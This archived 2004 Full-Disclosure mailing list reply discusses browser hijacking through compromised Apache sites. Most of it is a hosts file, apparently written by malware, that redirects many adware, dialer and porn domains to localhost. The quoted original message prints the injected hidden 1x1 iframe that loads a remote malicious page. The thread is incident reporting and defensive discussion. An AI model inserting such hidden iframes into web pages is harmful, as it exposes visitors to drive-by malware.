lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
From: Ian.Latter at mq.edu.au (Ian Latter)
Subject: browser hijack by apache sites

Hello Flibert,

I keep watching my auto-patching XP Home junk-box getting done
with techniques like this, while some rarely-patched XP Pros that
I look in, on, aren't.

I don't care anough about my junk machine to lock it down, but
the number of these browser hijacks is a bit much .. the last one
wast cute .. it did this to hosts .. (I think it felt sympathetic);

127.0.0.1 ruworld.com
127.0.0.1 69.50.170.125
127.0.0.1 213.159.118.226
127.0.0.1 63.219.178.91
127.0.0.1 63.219.181.7
127.0.0.1 maxxxhosters.com
127.0.0.1 64.237.46.147
127.0.0.1 therealsearch.com
127.0.0.1 213.159.117.236
127.0.0.1 thumbest-traffic.com
127.0.0.1 600pics.com
127.0.0.1 tonser.4-counter.com
127.0.0.1 66.230.145.49
127.0.0.1 free.sinpussy.com
127.0.0.1 hightcalldialer.com
127.0.0.1 bestpornnews.com
127.0.0.1 thumberland.com
127.0.0.1 greg-search.com
127.0.0.1 connect.online-dialer.com
127.0.0.1 0190-dialer.com
127.0.0.1 approvedlinks.com
127.0.0.1 install.xxxtoolbar.com
127.0.0.1 download.buxomatic.com
127.0.0.1 dia.4-counter.com
127.0.0.1 vse-moe.biz
127.0.0.1 crue.global-counter.com
127.0.0.1 line-plus.com
127.0.0.1 porno-links.biz
127.0.0.1 download.tntdialer.com
127.0.0.1 freelivesex.org
127.0.0.1 free3xmatures.com
127.0.0.1 bestpics.net
127.0.0.1 dikai.com
127.0.0.1 world-search.biz
127.0.0.1 1-se.com
127.0.0.1 58q.com
127.0.0.1 aifind.cc
127.0.0.1 aifind.info
127.0.0.1 allneedsearch.com
127.0.0.1 auto.ie.searchforge.com
127.0.0.1 awebfind.biz
127.0.0.1 best.royalsearch.net
127.0.0.1 cracks.am
127.0.0.1 default-homepage-network.com
127.0.0.1 find.microgirls.com
127.0.0.1 find4u.net
127.0.0.1 freshvideogals.com
127.0.0.1 i-lookup.com
127.0.0.1 ie-search.com
127.0.0.1 in.webcounter.cc
127.0.0.1 itseasy.us
127.0.0.1 just.find-itnow.com
127.0.0.1 link.startmake.com
127.0.0.1 mysearchnow.com
127.0.0.1 nativehardcore.com
127.0.0.1 qwertysearch123.biz
127.0.0.1 search.ieplugin.com
127.0.0.1 search.psn.cn
127.0.0.1 searchbar.findthewebsiteyouneed.com
127.0.0.1 searchcentrix.com
127.0.0.1 searchmyrequest.com
127.0.0.1 super-spider.com
127.0.0.1 t.rack.cc
127.0.0.1 teen-biz.com
127.0.0.1 teenhqpics.com
127.0.0.1 tits.hardcore4ever.net
127.0.0.1 webcoolsearch.com
127.0.0.1 wmmse.com
127.0.0.1 008i.com
127.0.0.1 2fastsearch.net
127.0.0.1 8095.com
127.0.0.1 alfa-search.com
127.0.0.1 boredlife.com
127.0.0.1 couldnotfind.com
127.0.0.1 cracks.am
127.0.0.1 daum.net
127.0.0.1 dreamwiz.com
127.0.0.1 find-itnow.com
127.0.0.1 find4u.net
127.0.0.1 firstbookmark.com
127.0.0.1 gajai.com
127.0.0.1 hand-book.com
127.0.0.1 hao123.com
127.0.0.1 hotsearchbox.com
127.0.0.1 hotwebsearch.com
127.0.0.1 hugesearch.net
127.0.0.1 iquicksearch.com
127.0.0.1 lookfor.cc
127.0.0.1 naver.com
127.0.0.1 nkvd.us
127.0.0.1 novafuck.com
127.0.0.1 ohcorea.com
127.0.0.1 omega-search.com
127.0.0.1 onet.pl
127.0.0.1 power-search.info
127.0.0.1 rightfinder.net
127.0.0.1 search-1.net
127.0.0.1 search-and-go.com
127.0.0.1 search-dot.com
127.0.0.1 search-space.com
127.0.0.1 searchforge.com
127.0.0.1 searching-the-net.com
127.0.0.1 searchv.com
127.0.0.1 searchxl.com
127.0.0.1 seznam.cz
127.0.0.1 slotch.com
127.0.0.1 spidersearch.com
127.0.0.1 startium.com
127.0.0.1 ttjj.com
127.0.0.1 viewpornkey.com
127.0.0.1 wazzupnet.com
127.0.0.1 websearch.com
127.0.0.1 windowws.cc
127.0.0.1 xgmm.com
127.0.0.1 xwebsearch.biz
127.0.0.1 yourbookmarks.ws
127.0.0.1 www.ruworld.com
127.0.0.1 www.maxxxhosters.com
127.0.0.1 www.therealsearch.com
127.0.0.1 www.thumbest-traffic.com
127.0.0.1 www.600pics.com
127.0.0.1 www.hightcalldialer.com
127.0.0.1 www.bestpornnews.com
127.0.0.1 www.thumberland.com
127.0.0.1 www.greg-search.com
127.0.0.1 www.0190-dialer.com
127.0.0.1 www.approvedlinks.com
127.0.0.1 www.vse-moe.biz
127.0.0.1 www.line-plus.com
127.0.0.1 www.porno-links.biz
127.0.0.1 www.freelivesex.org
127.0.0.1 www.free3xmatures.com
127.0.0.1 www.bestpics.net
127.0.0.1 www.dikai.com
127.0.0.1 www.world-search.biz
127.0.0.1 www.1-se.com
127.0.0.1 www.58q.com
127.0.0.1 www.aifind.cc
127.0.0.1 www.aifind.info
127.0.0.1 www.allneedsearch.com
127.0.0.1 www.awebfind.biz
127.0.0.1 www.cracks.am
127.0.0.1 www.default-homepage-network.com
127.0.0.1 www.find4u.net
127.0.0.1 www.freshvideogals.com
127.0.0.1 www.i-lookup.com
127.0.0.1 www.ie-search.com
127.0.0.1 www.itseasy.us
127.0.0.1 www.mysearchnow.com
127.0.0.1 www.nativehardcore.com
127.0.0.1 www.qwertysearch123.biz
127.0.0.1 www.searchcentrix.com
127.0.0.1 www.searchmyrequest.com
127.0.0.1 www.super-spider.com
127.0.0.1 www.teen-biz.com
127.0.0.1 www.teenhqpics.com
127.0.0.1 www.webcoolsearch.com
127.0.0.1 www.wmmse.com
127.0.0.1 www.008i.com
127.0.0.1 www.2fastsearch.net
127.0.0.1 www.8095.com
127.0.0.1 www.alfa-search.com
127.0.0.1 www.boredlife.com
127.0.0.1 www.couldnotfind.com
127.0.0.1 www.cracks.am
127.0.0.1 www.daum.net
127.0.0.1 www.dreamwiz.com
127.0.0.1 www.find-itnow.com
127.0.0.1 www.find4u.net
127.0.0.1 www.firstbookmark.com
127.0.0.1 www.gajai.com
127.0.0.1 www.hand-book.com
127.0.0.1 www.hao123.com
127.0.0.1 www.hotsearchbox.com
127.0.0.1 www.hotwebsearch.com
127.0.0.1 www.hugesearch.net
127.0.0.1 www.iquicksearch.com
127.0.0.1 www.lookfor.cc
127.0.0.1 www.naver.com
127.0.0.1 www.nkvd.us
127.0.0.1 www.novafuck.com
127.0.0.1 www.ohcorea.com
127.0.0.1 www.omega-search.com
127.0.0.1 www.onet.pl
127.0.0.1 www.power-search.info
127.0.0.1 www.rightfinder.net
127.0.0.1 www.search-1.net
127.0.0.1 www.search-and-go.com
127.0.0.1 www.search-dot.com
127.0.0.1 www.search-space.com
127.0.0.1 www.searchforge.com
127.0.0.1 www.searching-the-net.com
127.0.0.1 www.searchv.com
127.0.0.1 www.searchxl.com
127.0.0.1 www.seznam.cz
127.0.0.1 www.slotch.com
127.0.0.1 www.spidersearch.com
127.0.0.1 www.startium.com
127.0.0.1 www.ttjj.com
127.0.0.1 www.viewpornkey.com
127.0.0.1 www.wazzupnet.com
127.0.0.1 www.websearch.com
127.0.0.1 www.windowws.cc
127.0.0.1 www.xgmm.com
127.0.0.1 www.xwebsearch.biz
127.0.0.1 www.yourbookmarks.ws

I haven't been through your posted site ..  but maybe (a little
randomly) that list is relevant ..



----- Original Message -----
>From: "Filbert" <filbert@...dora.be>
>To: <full-disclosure@...ts.netsys.com>
>Subject:  [Full-Disclosure] browser hijack by apache sites
>Date: Sun, 23 May 2004 15:19:30 +0200
>
> Hi,
> 
> This is the second time this weekend that I've been warned of an apache site 
> on a Linux server were a line of code was added to redirect browsers to  porn 
> sites.
> First was the site of a Belgian political party. Second came today, and as of 
> writing this it's still there. The admin was informed so it can be gone soon.
> 
> hxxp://www.previsit.com/carrefour/nl/ <- hxxp must changed to http
> IE users do NOT click.
> 
> the code added at the bottom is:
> 
> <iframe SRC="http://www.b00gle.com/fa/?d=get" WIDTH=1 
> HEIGHT=1></iframe></body>
> 
> anyone seen this before? What vulnerability is exploited here? FP?
> 
> Thx,
> Filb.
> 
> -- 
> echo "+++ATH0filb@...ATH0filb@...uxmail.org" | sed 's/+++ATH0//g'
> 
> 
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html
> 

--
Ian Latter
Internet and Networking Security Officer
Macquarie University

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ